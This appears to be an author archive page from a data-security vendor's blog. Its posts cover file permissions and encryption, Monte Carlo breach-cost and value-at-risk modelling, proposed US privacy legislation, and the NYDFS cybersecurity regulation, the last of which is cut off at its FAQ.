All posts by Andy Green

Protect Your Data With Super Easy File Security Tricks!

Protect Your Data With Super Easy File Security Tricks!

Data security is an all-encompassing term. It covers processes and technologies for protecting files, databases, applications, user accounts, servers, network logins, and the network itself. But if you drill down a little in your thinking, it’s easy to see that data security is ultimately protecting a file somewhere on your system—whether desktops or servers. While data security is a good umbrella term, we need to get into more details to understand file security.

File Security and Permissions

As Microsoft reminds us, files (and folders or directories) are securable objects.They have access or permission rights for controlling who can read, write, delete, or execute at a very granular level through Access Control Lists (ACLs).  And in Linux world, we have a similar, although far less granular, system of permissioning.

Why have the concept of permissions in the first place?

Think of an enterprise computing environment as a semi-public place – you’re sharing a data space with not just anyone, but other employees. So a file is not the equivalent of box with a lock preventing anyone from accessing who doesn’t have a combination or key. Well, there is encryption, but we’ll cover that below. Instead the assumption in a Windows or Linux or other operating system environment is that you want to share resources.

The operating systems file system permission are there to provide a broad way to limit what can be done. For example, I want workers in another group to read our presentations, but I certainly don’t want them to edit. In that case, we’d specify – to be shown below – read and write permission for users who belong to group, and just read permission for everyone else.

In the Beginning, There Was Unix-Linux Permissions

Let’s look at a very simple permissioning system. It’s the classic Unix-Linux model, which provides basic read-write-execute permissions and a very simply method of deciding who these permissions apply to. It’s called the user-group-other model. Effectively, it divides the user community into three classes: the owner of the file (user), all those users belonging to groups that the owner is a member of (group), and finally everyone else (other). You can see this permission structure when you run an ls –l command:

How do you specify a permission to add or subtract from a user-group-other? There’s the Linux chmod command. Suppose I decided that I’d like other users in groups I belong to have access to my-stuff-2. doc file, which  I had  been keeping private. I could do this:

chmod g+r my-stuff-2.doc

Or now I want to take back and make private the presentation-secret.doc file, which I had allowed other groups to view and update:

chmod g-rw secret-presentation.doc

The Unix-Linux permission model is simple and well-suited for server security, where there are system-level applications accessed by a few privileged users. It is not meant for a general user environment. For that you’ll need ACLs.

What are Access Control Lists?

Windows has a far more complex permissioning system than Linux. It allows users to define a permission for any Active Directory user or group, which is represented internally by an unique number known as a SID (security identifier). WIndows ACLs consist of a SID and another number representing the associated permission — read, write, execute, and more. This is called an  access mask The SID and the mask together are referred to as an access control entry or ACE.

We’ve all seen the user-friendly representation of the ACE when we view a file or folder’s properties:

Four ACEs are shown for a file. And the access mask for the Administrator’s SID is in human readable form in the  bottom pane.

Obviously, ACLs can make permissioning quite complex. In theory, you can have ACEs for each user that needs to access a file or folder. No, you shouldn’t do that! Instead, there’s the preferred method of assigning users to a group and then combining all those groups that need access to a folder into a larger group. This umbrella group is then used in the ACL. I’ve just described something called AGLP for Account, Global, Local Permissioning, which is Windows approved method for efficient file and folder permissioning.

So if an employee moves to another project (or leaves the company) and therefore no longer needs access, you simply remove that user from the Active Directory group without having to adjust the ACE in the specific folder or file.

Easy peasy in terms of file security management. And a sensible way to reduce security risks in an enterprise computing environment.

And Along Came File Encryption

If you’re paranoid, there is encryption, which is certainly a valid, if extreme technique,  for solving the issues of file security. It may be safe, but certainly a very impractical solution to securing file data. Windows supports encryption, and you can turn it on selectively for folders.

Technically, Windows use both asymmetric and symmetric encryption. The asymmetric part decrypts the symmetric key that does the actual block encryption/decryption of the file. The user has access to the private part of the asymmetric key pair that gets the whole process started. And only the owner of the folder can see the unencrypted files.

Obviously, with one user in control of the encryption, this does not lend itself to allowing multiple users to share access to files and folders. Add on that the potential for losing access to the asymmetric encryption key, which is kept in a certificate, and you can have a self-made ransomware attack on your hands. And yes, you should backup encryption certificates!

WIndows does allow you to set encryption on a folder. That doesn’t mean you should!

As we’ve been saying all along, the file system is where employees keep and share the content (spreadsheets, documents, presentations) that they’re working on now. It’s their virtual desks, and adding a layer of encryption is liking moving things around and making their desk even sloppier — no one likes that! —  as well as being administratively difficult to manage.

Pseudonymization: Selective File Encryption

And this brings us to pseudonymization.

It’s a GDPR-approved technique for encoding personal data in order to reduce some of the burdens of this law.

The idea is to replace personal identifiers with a random code. It’s the same idea behind writers using pseudonyms to hide their identities. The GDPR says you can do this on a larger scale as a way to lessen some of the GDPR requirements.

Generally, there would have to be an intake system that would process the raw data identifiers and convert them to these special codes. And there would have to be a master table that maps the codes back into the real identifiers for those processes that need the original information.

Using this approach, employees could then work with pseudonymized files in which the identities of the data subjects would be hidden. The rest of the file, of course, would be readable.

Partial encryption is perhaps one way to think about this technique.

Like encryption, pseudonymization is considered a security protection measure (see the GDPR’s article 32) and it’s also explicitly mentioned as a “data by protection by design and by default” or PbD technique (see article 25). It’s also considered a personal data minimization technique — very important to the GDPR.

Will pseudonymization spread beyond the EU’s GDPR and be adopted by the US in its own coming data privacy and security law?  We will see!

Best File Security Practices

Enterprise computing environments are designed to help employees get their work done. Sure there are built-from-the-ground-up secure operating systems, but they’re meant for top-secret government projects (or whatever Apple is working on next). For the rest of us, we have to learn to work with existing commercial operating systems, and find ways to minimize the risks of data security lapses.

Here are three easy-to-implement tips for boosting your file system security.

  1. Eliminate Everyone – The default Everyone group in Windows gives global access to a folder or file. You would think that companies would make sure to remove this group from a folder’s ACL. But in our most recent annual Data Risk Report, we’ve discovered that 58% of companies we sampled had over 100,00 folders open to every employee! Sure you’ll need to grant Everyone if you’re sharing the folder over the network, but make sure to remove from it from ACL and then do the following RBAC analysis .
  2. Roll Your Own Role-based Access Controls (RBAC) – Everyone has a job or role in an organization, and each role has with it an associated set of access permissions to resources.  Naturally, you assign similar roles to the same group, and then apply to them the appropriate permissions, and then  follow AGLP method from above. When implemented correctly, this should be easy to maintain while reducing security risks. Yes, this does require more than a little administrative overhead to maintain.
  3. Minimal Least Privilege Permission – This is related to RBAC, but it involves focusing particularly on “appropriate” permission. WIth the least privilege model, you pare down access to the minimum that is needed for the role. Marketing may need read access to a folder controlled by the finance department, but they shouldn’t be allowed to update a file or perhaps run some special financial software. Administrators need to be ruthlessly stingy when granting permissions with this approach.

I lied. These tips are super-easy to understand, but not super-easy to implement! You’ll need some help …

We just happen to have a solution that will make these great tips easier to put into practice.

 

 

CEO vs. CISO Mindsets, Part IV: Monte Carlo Breach Cost Modeling for CISOs!

CEO vs. CISO Mindsets, Part IV: Monte Carlo Breach Cost Modeling for CISOs!

My main goal in this series is to give CISOs insights into CEO and board-level decision making so they can make a winning case for potential data security purchases. In my initial dive last time, I explained how CISOs should quantify two key factors involved in a breach: the frequency of attacks, and then the probability that the breach itself exceeds a certain cost threshold. Knowing these two ingredients (and that there are numbers or ranges of numbers you can assign to each) will earn you points with CEOs and CFOs.

It’s second nature for the top corporate honchos to make decisions under uncertainty: they are pros at placing the right bets and knowing the odds. And CISOs should understand the language of risk, and how to do some basic risk math.

Sure CEOs should also have basic knowledge of the amazing post-exploitation tricks hackers have at their disposal, and I’ll take that up in the next post. But I think the bigger gap to cover is getting CISOs up to speed on biz knowledge.

As a bonus for CISOs and tech execs for getting this far in the series, I’ve put together a wondrous Excel spreadsheet so that you can do your own, gasp, Monte Carlo-style modeling! You’ll truly impress CEOs in your next presentation by tweaking this simulation for your particular company and industry.

Let’s Be FAIR

I’m a fan of the FAIR Institute and its framework for analyzing risk. Sure there are lots of risk information on the Intertoobz, but the FAIR gang are excellent educators and guides into what is, ahem, a very wonky topic. You can go as deep as you want into the FAIR analysis, but as I described in the previous post, even a shallow dive can provide very useful results for making decisions.

At the first level of FAIR’s analysis, you need to look at the two factors I mentioned above. First, derive an exceedance loss curve for your particular industry or company. In my case, I was able to use a public healthcare dataset of breaches reported under HIPAA, and then apply results from a breach cost regression based on Ponemon’s breach survey.

I’m able to say what percentage of healthcare breaches fall above any given cost amount for a single incident.

By the way, a similar type of curve is also calculated by insurance companies for auto and home policies. It’s the same problem! For them a large claim is similar to a costly data breach. Ultimately, insurance companies use the loss exceedance curves to work out premiums that help cover the insurance costs and give them a profit. And we can think of the cost of a data security software license also as kind of a premium companies pay to limit the loss of a breach accident.

Anyway, the second factor is the frequency or rate at which companies are breached. You can guesstimate an average rate, which is what I did last time for my hypothetical healthcare company. 

This does bring up a more important point: what happens when you have limited real-world data? Thankfully, the FAIR approach allows for this, and there are techniques to combine or weigh internal information collected by your infosec team — say, the frequency of successful SQL injections in the last 5 years—with any available public information from the external sources such as Verizon DBIR. This idea is partially covered in a video the FAIR people put together.

What do you do with both of these factors?

You multiply them: frequency X single loss equal total loss. Well, it’s not quite that simple!

Exact formula are generally not easy to come by for real-world scenarios. And that’s why you run a Monte Carlo (MC) simulation!

In an MC Simulation, you “spin the dice” — using Excel’s built-in random number generator — to simulate an attack occurring. And then you spin the dice again to generate a possible loss for an attack. You tally the losses, rank them, and produce a curve a representing the total exceedance losses for a given average frequency over a period of time.

In my MC simulation, I rolled the dice a few thousand times using an Excel spreadsheet with special Visual Basic macros I added. I modeled a healthcare company experiencing an average rate of four incidents over ten years, and a single loss curve based on the HIPAA dataset to produce the following total loss curve:

The total breach cost exceedance loss curve. The ultimate goal of the MC simulation!

This is really the goal of the simulation: you want a distribution or curve showing the sum of losses that occur when a random number of attacks occur over a given time period. Armed with this kind of analysis, imagine making a presentation to your CEO and CFO and confidently telling them: “There’s a 10% chance that our company will face a $35 million breach loss in the next 10-years.” Your CEO will look at you going forward with loving C-level eyes.

The key lesson from FAIR is that you can quantify data breach risk to produce a good enough back-of-the-envelope calculation that’s useful for planning. It’s not perfect by any means, but it’s better than flying blind. Think of it as kind of a thought experiment, similar to answering a Google-style interview question. And as you go deeper down into FAIR, the exercise of analyzing what data is at risk, its value, and red-teaming possible breach scenarios is valuable for its own sake! In other words, you might …  learn things you didn’t know before.

Value at Risk for CISOs

My analysis of the HIPAA data involved some curve wrangling using off-the-shelf stats software. I was able to fit the dataset to a power-law style curve — wonks can check out this Pareto distribution. Heavy-tailed curves, which are very common for breach stats (and other catastrophe data), can be approximated by a power-law like formulas in the tail.  

That’s good news!

It’s easier to work with power laws when doing simulations and crunching numbers, and the tail is really the most interesting part for planning purposes — it’s where the catastrophes are found. Sure CFOs and CEOs look at average losses, but they’re far more focused on the worst cases.

After all the C-levels are charged with keeping the company going even when the breach equivalent of a Hurricane Sandy comes. So they have to be prepared for these extreme events, and this means making the investments that limit the losses for catastrophic losses found in the tail.

And that brings us to Value at Risk or VaR.

Let’s just demystify it first. It’s really a single number that tells you how bad things can get. A 90% VaR for breach losses is the number that’s greater than all but 10% of all losses. A 95% VaR is greater that all but 5%.

In the curve above, you get the VaR by going to the y-axis, finding the 5% or 1% value and following the horizontal line to the curve, and then dropping down to the X-axis to get the value. It’s really a exercise in doing a reverse lookup. Hold that thought.

You run my MC simulation having inputted average frequency rates, and a single loss curve (or really the tail) based on a real-world dataset, and then let it generate thousands of possible scenarios. For VaR purposes, you and your C-levels are very interested in a select few scenarios — the ones that show up at the top of a ranked list.

Below you can see specific sample runs from my Excel spreadsheet for 90%, 95%, 97.5%, and 99% VaRs. So at the end of 10 years, the 99% VaR is over $120 million, and it turns out involves three events — notice the jumps.

Notice the huge jumps in the the 97.5% and 99% curves. It’s a feature (not a bug) of heavy-tailed curves.

The Mysteries of the Heavy-Tailed Dragon 

I lied. It turns out that for heavy-tailed distributions you really don’t have to run a MC simulation to come up with some VaR numbers. There is a formula! 

I’ll hint at what it might be, but to see what it is in the case of a Pareto distribution, you’ll have to download the spreadsheet. The VaR formula enables you to do a quick napkin calculation. The MC simulation is still useful to verify the formula with simulated data based on your modeling.

For background on all this, there’s a surprisingly readable presentation for this mathy subject written by two statistics guys. They describe in simple terms some of the mysterious properties of these heavy-tailed beasts. Yes, dragons are magical. One of their stranger powers is that these beasts will womp you by a single crushing event. You can see that in the 97.5% and 99% VaRs in the 10-year simulation above. Notice there’s one huge jump in both these cases.

Another strange and magical thing is that a good VaR approximation can be calculated easily for many heavy-tailed datasets. I suggested it above. Essentially, you can think of the VaR as a reverse look-up. That means in math-speak the inverse of a formula. In the case of multiple losses that have a given rate or frequency over a time period, the VaR formula can be calculated by a slight tweak in the inverse Pareto distribution. You’ll have to check out my Excel spreadsheet for the true formula.

What else can you do with all this probability information?

You can start working out whether an investment in data security software will pay for itself — assuming the software prevents the attack. In my spreadsheet, I let you calculate a break-even percentage based on a yearly security investment. And I’ve also worked out the average payback — how much money your software defenses will save you, on average.

Data security software pays for itself! Here’s a worked out example for a $400,000/year investment assuming a heavy-tailed Pareto curve based on HIPAA breach data.

Let’s call it a day.

I’ll have a few more thoughts on VaR in the next post, and then we’ll get into basic knowledge that CEOs should know about post-exploitation.

I’ll end this post with a lyric from the greatest band ever, Abba of course, which I think brilliantly summarizes the devastating power of heavy-tailed breach loss distributions:

But I was a fool
Playing by the rules
The gods may throw a dice
Their minds as cold as ice
And someone way down here
Loses someone dear

Thanks Benny for this great insight into breach costs.

Download the breach cost modeling spreadsheet today!

Wyden’s Consumer Data Protection Act: How to Be Compliant

Wyden’s Consumer Data Protection Act: How to Be Compliant

Will 2019 be the year the US gets its own GDPR-like privacy law? Since my last post in this series, privacy legislation is becoming more certain to pass. Leaders from both parties are now saying they will focus on privacy in 2019. Consider yourself warned!

I’ll continue my journey from last time into the Wyden legislation since it’s a good baseline. Sure there are other bills, but they share some common elements. I’ve already discussed Wyden’s broader definition of personally identifiable information (PII), and its data risk assessment requirements in the last post.

In this round, we’ll get into the bills stronger consumer rights (involving right to access and correct), and discuss the baseline security requirements that are mentioned. As before, I’ll add my predictions as to what to expect. And I’ll conclude with some ideas for getting ahead of the curve, so when we inevitably have a new law (in one form or another), you’ll be compliant from day one.

Right to Access

It shouldn’t come as a surprise that whatever legislation is ultimately approved, it will give the consumers more power over their data. This was roughly the consensus from the Senate hearings a few months back. Of course, the devil is the details.

The Wyden bill gives consumers more control over how the data is shared —  it calls for opt-out when sharing to third-parties. This legislation also allows consumers to see what personal data is held by companies, and asks for a process to allow them to correct inaccurate data.

In the Wyden bill, I did not see a “right to be forgotten”. Instead there is some language about minimization and asking companies to assess the risk involved in data duration. During the Senate hearings in September, there was obviously some resistance from the usual suspects about losing the power to keep tabs on online user forever. However, at least one executive from a major hardware manufacturer of cell phones, laptops, and pad computing devices was open to the idea (see response to question 4).

From the Wdyen bill. You’ll be able to make subject access requests (SARs).

Prediction: The recent California privacy law does have a “right to erase” requirement, but with some exceptions including this wide-open possibility: “Used solely for internal uses that are reasonably aligned with the expectations of the consumer.”  My guesstimate is that the US will have a weaker form of the “right to be forgotten” with enough wiggle room to allow search-engine and social media companies to continue their business practices. I think we’ll likely see stricter language on data retention that put limits on how long companies can keep data when there’s no longer a real business need. This option might be a more realistic way to implement data erasure, but it would force them to keep track of metadata –when the data was collection and the reasons for it.   

Data Security Baseline

The current crop of Congressional legislation is focused on privacy.  To no one’s surprise, strong data security ideas — restricted access, multi-factor authentication, encryption, retention limits, annual pen-testing, incident response, etc. — are not finding their way into these bills. What I’m seeing, at least in the Wyden bill, is boilerplate language for “technological and physical safeguards” to reduce overall risk.

However, these bills do leave additional rule-making to a regulatory agency — the Federal Trade Commission — and so tougher data security rules could be coming down the road.

Prediction: In the first round of privacy legislation, we’re not going to get the tougher security rules that GDPR has — for example, it’s Article 32 Security of Processing and its breach reporting articles 33 and 34. Instead, we’ll have required risk assessments, and annual reporting. For example, the Wyden legislation calls for a certified data protection report (for companies with revenues above $1 billion) to prove they are protecting the privacy and security of the data they hold. When there are enforcement actions, the company can minimize penalties by using the reports to show they’ve been doing their homework.

Next Steps

Data privacy and security changes are coming to the US. For many companies that are following common standards, such as PCI DSS, ISO 27001, or CIS Critical Security Controls, the coming legal requirements should not be too much of a stretch. Keep in mind that these laws are taking standard IT security ideas and now making them mandatory.

And there will be fines! The Wyden bill, for example, specifies civil penalties of up to 4% of total revenue.

If you’re starting from scratch or want to revisit your existing programs, here are three areas that are worth adding to your  IT New Year resolutions list:

  • Data classification of file systems – You can’t protect what you don’t know you have. Data classification is an essential part of any data security program. And in fact, the aforementioned standards have data classification requirements, which typically goes under the broader name of asset identification. For file systems, we’re talking about scanning its core elements of folders and files and searching for relevant data as defined by the laws. No, this can’t be done easily. You’ll need special automated software to efficiently index the file system and pattern match on the appropriate PII.
  • Risk Assessments – You’ve indexed, and classified the data. The next step is to determine what’s at risk. With file data, we’re interested in who owns the resource, who’s accessing it, and most importantly who should be accessing. We know from many years worth of hacking incidents, that once the attackers are in and steal the credentials of ordinary users, too often they have more than enough file privileges to access and exfiltrate sensitive data. The goal of data-oriented risk assessments is to find these overly permissioned folders, and then remediate by restricting access to appropriate users. Risk assessments that are data focused are far better at identifying the root cause of incident risk — the credit card or customer information contained in folders with “Everyone” permission!
  • Incident Response – While the current legislation may not have a “72-hour reporting” rule, it’s still important to have your ducks in line. You should have a response program in place that can quickly identify potential abnormal activities and notify IT in timely way. Sure, integrated security software that can classify, identify permissions, and log all file activity is in a far better position to notify IT when there truly is unusual activity associated with hackers.

While you’re mulling over this series, and start to revamp your own security programs in 2019, we’ll continue keep you posted on what’s going on in Congress.

Wyden’s Consumer Data Protection Act: Preview of US Privacy Law

Wyden’s Consumer Data Protection Act: Preview of US Privacy Law

The General Data Protection Regulation (GDPR) has, for good reason, received enormous coverage in the business and tech press in 2018. But wait, there’s another seismic privacy shift occurring, and it’s happening here in the US. There is now a very good chance that significant data privacy legislation will come to the US soon. I’ll go out on a limb, and say in 2019. But if not next year, then certainly in 2020.

Yes, we’ll likely see GDPR-lite privacy requirements becoming yet another compliance consideration for US companies in the very near future.

No, hell has not frozen over. In fact, over the years there have been various US data security and privacy laws kicking around Congress. With GDPR becoming a reality, and some well publicized privacy lapses making headlines, Silicon Valley companies decided to back federal privacy legislation, rather than having to deal with separate state initiatives.

In September, AT&T, Google, Amazon, Twitter and Apple, testified in Senate hearings in favor of a federal privacy law, with  each offering their own frameworks. They were essentially calling for a simplified version of GDPR. In short, they agreed to stricter consumer controls over their personal data, including a right to deletion/correction, and explicit opt-in for collection and sharing of consumer data.

Let’s Hit the Law Books

Congress has also gotten busy and started introducing their own newly cooked-up batch of privacy legislation with Senators Blumenthal and Wyden taking the lead. There are other Senators weighing in as well.

So what’s in these proposed laws? Well, Blumenthal’s has not been published, but Wyden’s has a fully-formed privacy bill available on the Senate website.

These are big pieces of legislation — though not nearly as complex as GDPR — so I don’t blame you for not immediately diving in and trying to decipher. However, I’ve generously volunteered to do the heavy-lifting, and have spent a few afternoons looking for the good parts, so to speak. While we won’t know what the final US privacy law will look for at least a few months, I’m betting that some of the key elements of the Wyden bill will make the cut.

In this two-part series, I’ll explain what I think a future US law will look like and come up with some short-term next step that can be addressed by your CSO and CIO, sooner rather than later.

If I had to summarize, I’d say we can expect a far broader definition of personally identifiable information (PII) than what’s in most state laws, stronger consumer rights and protections over this data (opt-in, correct, delete), obligations to analyze data and assess risks, a minimum baseline for data security, and, last but not least, significant fines and other penalties for not following the law.

What won’t be in the coming US privacy law? If I’m reading the tea leaves correctly, there won’t be breach notification rule, like the GDPR has. Not yet anyway.

That’s the big picture view. So let’s get into some of the details and in the spirit of end-of-year prognostications, I’ll add my predictions for what I think will ultimately become part of the privacy law of the land in the US.

1. Personal Information

We’re going to get a more modern version of PII. Period. Wyden’s Consumer Data Protection Act (CDPA) defines personal information as data “that is reasonably linkable to a specific consumer or consumer device.” This is about as encompassing as you get and would include quasi -identifiers — for example, birthdate, zip code, and gender — that I wrote about once upon a time.

On the other hand, the personal information definition in, say, Senator Thune’s proposed data security law is not nearly as abstract and instead lists all the usual identifiers — name, address, account, license. It does call out, though, internet-era identifiers and information – user name, passwords, and bio data.

Keep in mind that even traditional identifiers, such as license numbers, can vary by state, and I won’t even get into financial account numbers. To comply with a federal privacy law, you’ll need sophisticated pattern matching to deal just with legacy identifiers spread out across your file system.

What’s a possible solution to the identifier chaos in terms of legal language? The US does have a hybrid model for PII with the HIPAA law, and its definition of protected health information (PHI). All your health information is technically under HIPAA, but to make it easier for insurers and other covered entities, the government created a loooong list of explicit safe harbor identifiers. In short, if you protect these 18 identifiers, you’re in compliance.

Prediction: I’ll boldly predict that we won’t see a GDPR-style definition of personal definition, like what’s in the Wyden bill, but instead we’ll get a list approach, but one that will include basic online identifiers — user name, passwords, handles, PINs, etc. — as well as the legacy ones. In any case, most companies will have to up their game to track and classify data based on this longer list.

2. Risk Assessments and Compliance Reports

Definition of risk assessment from Wyden’s CDPA.

The Wyden legislation makes risk assessments a centerpiece of its privacy requirements. The law goes into some detail about assessments needing to be made based on a few factors, include data minimization, storage duration, and accessibility. It restricts these assessment, though, to automated decision making – that is, algorithms. But the Thune legislation, as just one other example, has more general risk assessment requirements.

Additionally, the proposed Wyden law asks larger companies (above $1 billion revenue)  to produce annual data protection report to show that they have “reasonable cyber security and privacy policies” in place. Of course, risk assessments are a standard part of reasonable data security and privacy programs.

The Wyden law, by the way, also requires the CEO, the chief privacy officer (CPO), and the chief information officer (CIO) to certify the report!

Prediction:  We will see explicit language about risk assessments and data security policies (minimization, access, etc.). We are over the self-policing phase of data privacy and security, and this new law will force US companies to prove that their IT departments are doing what they claim. For a sneak preview of what might be in store, check out the NYDFS Cyber Regulation, which gets into nitty-gritty detiails in terms of security program requirements, including an annual report summarizing these efforts.

We’ll continue in the next post with more of what to expect in next year’s US privacy law. And I’ll provide some ideas for how to get ahead of the curve!

 

Continue reading the next post in "GDPR American-Style"

CEO vs. CISO Mindsets, Part III: Value at Risk For CISOs

CEO vs. CISO Mindsets, Part III: Value at Risk For CISOs

To convince CEOs and CFOs to invest in data security software, CSOs have to speak their language. As I started describing in the previous post, corporate decision makers spend part of their time envisioning various business scenarios, and assigning a likelihood to each situation. Yeah, the C-level gang is good at poker, and they know all the odds for the business hand they were dealt.

For CSOs to get through to the rest of the C-suite, they’ll need to understand the language of risk and chance. It is expecting too much for upper-level non-IT executive to appreciate, say, operational reports on the results of vulnerability scans or how many bots were blocked per month. It’s definitely helpful for IT, but the C-suite is focused on far more fundamental measures.

They would want to know the answer to the following question: can you tell me what are the chances of a catastrophic breach or cyber event, perhaps costing over $10 million, occuring in the next 10 years? Once CEOs have this number, then they can price various options to offset the risk and keep their business on track.

I suspect most IT departments, except in all but the largest companies where formal catastrophe planning is part of their DNA, would be hard pressed to come up with even rough estimates for this number

In this post, I’ll guide you into doing a back-of-the-envelope calculation to answer this question. The approach is based on the FAIR Institute’s risk analysis model. Their core idea is that you can assign numbers to cyber risk using available data sources — both internal and external. In other words, you don’t have to fly completely blind in the current cyber threat environment.

FAIR (and other approaches as well) effectively break down the cost of a data breach into two components:  the severity or magnitude of a single incident and the frequency at which these cyber events over a given period of time. Simple, right?

The FAIR approach in one picture: loss frequency X loss magnitude = average loss.

If you’re thinking, that you can multiple the separate averages of each —  frequency and  severity — to obtain an average for yearly cyber losses, you’re right (with some qualifications). The advantage of the FAIR model is that it allows you to go as deep as you want, depending on your resources, and you can get more granular information beyond broad averages.

I should add that FAIR is not re-inventing the risk wheel. Instead they’ve systemized techniques used principally by banks and insurance companies who have long had to handle catastrophes, financial crises and natural disasters, and know how much to a set aside for the proverbial rainy day.

Mastering Data Disasters: How Bad Is the Risk?

In the last post, I took two years of HIPAA breach reporting data to derive what I called an exceedance loss curve. That’s a fancy way of saying I know the percentiles (or quantiles in risk-speak) for various cyber costs . For this post, I rearranged the curve to make it a bit more intuitive, and you can stare at the graph below:

We finally have a little more insight into answering the question a CEO of a health insurer might ask: how bad can it get?

Answer: Pretty bad!

The top 10% of healthcare cyber incidents can be very costly, starting at $8 million per attack. Yikes.

It’s also interesting to analyze the “weight” or average cost of the last 10% of this severity curve. As we’ll soon see, this is a power-law-ish Pareto style distribution that I talked about back here.

I did a quick calculation using the HIPAA data: the top 10% (or 90th percentile) of incidents, representing under 30 data points, carries a disproportionate 65% of the total cost of all losses! With heavy-tailed curves, we need to focus on the extremes or tail because that’s where all the oomph is.

If we were to do a more sophisticated analysis along the lines of FAIR, we would then take the above healthcare loss severity distribution and merge with both internal loss data (if available) and a risk profile based on, perhaps, a survey of company infosec experts.

Naturally, it would be very helpful to conduct a data risk assessment to discover how much sensitive data is spread out across your file systems, and their associated permissions. This would be fed into the risk formulas.

There are some math-y methods to combine all this together using various weights, and you can learn more about this in Doug Hubbard’s RSA presentation, or (shameless plug) in his book: How to Measure Anything In Cybersecurity Risk.

Healthcare Incident Rates and the Ultimate Average

For our purposes, let’s take the HIPAA reporting data as a good representation of how bad breach costs can be for our imaginary healthcare insurance company.

Now let’s deal with the next component. For the frequency or ate at which incidents occur, you may want to rely more heavily on your own internal data. There are also external data sets. For example, the Identity Theft Resource Center tracks breach incidents by industry sectors, and their health care numbers can guide you in your guesstimating.

Let’s say, for argument’s sake, that our insurer has has logged one significant cyber incident every four years, for an average rate of “.25 incidents” per year.

Drumroll . ..  I multiply the average incident rate, .25, by the average loss or severity cost of the $4.2 million (from the above curve) to come up with an average annual loss of about $1 million.

This number may be eyebrow-raising to CISOs and CEOs of our hypothetical healthcare company. We are dealing with heavy-tailed data, and while this company may not have experienced a $4 million average for an incident (yet), the average tells how bad it can get. And this can help guide C-levels in deciding how much to spend on security risk mitigation — software, training, etc.

With two parameters, alpha and beta, you can go into the breach cost prediction business.

To go a little deeper,  I used stat software — thank you EasyFit! — for some curve wrangling. I picked a power-law distribution, known as Pareto-2, to fit the data.

Though there are more comfy fits with other heavy-tail distribution in their software, it turns out that this is a very good approximation for the tail, which is really what we’re interested in. And as we’ll soon see, this function will help us more precisely say how bad it can get.

Towards Value at Risk (VaR)

I just took you on a speedy tour through the first level of the FAIR approach. The average number we came up with, known in trade as AAL (average annual loss), is good baseline for understanding cyber risks.

As I suggested above, the CEO and (especially) the CFO want more precise information. This leads to Value at Risk or VaR, a biz-school formula that financiers and bankers use in their risk estimates.

If you’ve ever taken, as I have, “statistics for poets”, you’ll immediately recognize VaR as the 90% or 95% confidence formula for normal curves. Typically, CFOs prefer measuring the 99% level — 2.3 standard deviations from the mean — or the “once in a hundred year” event.

Why?

They are planning for extreme situations! You can think of CFOs grappling with how much to set aside to deal with the equivalent of a cyber tornado or hurricane, and for this, VaR is well suited.

Using my stats software, I came up with a 90% VaR formula — once in 10 year event — for my non-normal heavy-tailed distribution: it calculates a VaR of $8.2 million, which is close to the actual HIPAA data at the 10% mark in the graph above. Good work, EasyFit!

The advantage of having a VaR formula, which I’ll go into more detail next time, is that it enables us to extrapolate: we can answer other questions beyond what the data tells us.

For example: what can I expect in breach costs over a 10 year period assuming on average of, say, three cyber events in that period? I won’t hold you in suspense …  the 90% VaR formula tells us it’s about $19 million, under 3 times the average cost of a single cyber event.

Let’s call it a day.

I’ll go over some of this material again, and tie it all up into a nice package in my next post. And we’ll learn more scary details about evil heavy-tailed breach loss curves.

Continue reading the next post in "CEO vs. CSO Mindsets"

NYDFS Cybersecurity Regulation in Plain English

nydfs cybersecurity regulation title and logo for

In 2017, the New York State Department of Financial Services (NYDFS) launched GDPR-like cybersecurity regulations for its massive financial industry. Unusual at the state level, this new regulation includes strict requirements for breach reporting and limiting data retention.

Like the GDPR, the New York regulation has rules for basic principles of data security, risk assessments, documentation of security policies, and designating a chief information security officer (CISO) to be responsible for the program.

Unlike the GDPR, the regulation has very specific data security control, including annual pen testing and vulnerability scans!

The point of these rules, as with the GDPR, is to protect sensitive nonpublic information, which is essentially consumer personally identifiable information or PII that can used use to identify an individual.

NYDFS Cybersecurity Regulation Defined

The NYDFS Cybersecurity Regulation (23 NYCRR 500) is “designed to promote the protection of customer information as well as the information technology systems of regulated entities”. This regulation requires each company to conduct a risk assessment and then implement a program with security controls for detecting and responding to cyber events.

Who Does NYDFS Cybersecurity Law Apply to?

list of who the nydfs cybersecurity regulation applies to

The NYDFS has supervisory power over banks, insurance companies, and other financial service companies. More specifically, they supervise the following covered entities:

  • Credit Unions
  • Health Insurers
  • Investment Companies
  • Licensed Lenders
  • Life Insurance Companies
  • Mortgage Brokers
  • Savings and Loans Associations
  • Private Bankers
  • Offices of Foreign Banks
  • Commercial Banks

In short: any institution that needs a license from the NYDFS is covered by this regulation. A more extensive list can be found here.

There are some exemptions for companies that fall under the following categories:

  • Fewer than 10 employees, including any independent contractors, of the Covered Entity or its Affiliates located in New York or responsible for business of the Covered Entity, or
  • Less than $5,000,000 in gross annual revenue in each of the last three fiscal years from New York business operations of the Covered Entity and its Affiliates, or
  • Less than $10,000,000 in year-end total assets, calculated in accordance with generally accepted accounting principles, including assets of all Affiliates, or
  • There’s no storing or processing of nonpublic information.

How Does The NYDFS Cybersecurity Regulation Work?

The NYDFS Cybersecurity Regulation works by enforcing what are really common sense IT security practices. Financial companies in New York that are already rely on existing standards, say PCI DSS or SANS CSC 20, should have little problem meeting the New York regulation.

In short, NYDFS is asking organization to assess their security risks, and then develop policies for data governance, classification, access controls, system monitoring, and incident response and recovery. The regulation calls for companies to implement, at a minimum, specific controls in these areas (see the next section) that are typically part of compliance standards.

The big difference of course is that New York State regulators at the Depart of Financial Services are enforcing these rules, and that not complying with the regulation becomes a legal matter. They are even requiring covered entities to designate a CISO who will annually sign off on the organization’s compliance.

What Are The NYDFS Regulation Requirements?

nydfs cybersecurity regulation requirements

Covered entities will have to implement the following:

  • Risk Assessments – Conducted periodically and will be used to assess “confidentiality, integrity, security and availability of the IT infrastructure and PII. (Section 500.09)
  • Audit Trail – Designed to record and respond to cybersecurity events. The records will have to be maintained for five years. (Section 500.06)
  • Limitations on Data Retention – Develop policies and procedures for the “secure disposal” of PII that is “no longer necessary for business operations or for other legitimate business purposes” (Section 500.13)
  • Access Privileges – Limit access privileges to PII and periodically review those privileges. (Section 500.07)
  • Incident Response Plan – Develop a written plan to document internal processes for responding to cybersecurity events, including communication plans, roles and responsibilities, and necessary remediations of controls as needed. (Section 500.16)
  • Notices to Superintendent – Notifications to the NYFS within at most 72-hours after a “material” cybersecurity event has been detected. (Section 500.17)

NYDFS Cybersecurity FAQs

    1. Do you have to report all cybersecurity events within 72-hours to NYDFS?
